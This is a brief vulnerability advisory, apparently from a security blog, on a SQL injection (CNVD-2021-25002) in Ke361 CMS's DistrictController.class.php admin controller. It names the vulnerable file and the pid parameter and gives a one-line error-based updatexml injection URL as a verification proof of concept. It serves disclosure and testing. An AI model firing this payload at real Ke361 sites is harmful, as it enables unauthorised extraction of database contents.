Ke361 Districtcontroller Class Php Background Sql Injection Vulnerability Cnvd 2021 25002
Ke361 Districtcontroller Class Php Background Sql Injection Vulnerability Cnvd 2021 25002
Ke361 DistrictController.class.php Background SQL injection vulnerability CNVD-2021-25002
Vulnerability Description
Ke361 DistrictController.class.php index() function pid parameter has SQL injection vulnerability, through which database sensitive information can be obtained
Vulnerability Impact
Ke361
Environment construction
https://gitee.com/jcove/ke361
Vulnerability reappears
CMS Product Page
The vulnerable file is Application/Admin/Controller/DistrictController.class.php
Verify POC
1
admin.php?s=/District/index/pid/1)%20AND%20updatexml(1,concat(0x7e,(select%20md5(1)),0x7e),1)--+
If you gain something, just like it
This post is licensed under CC BY 4.0 by the author.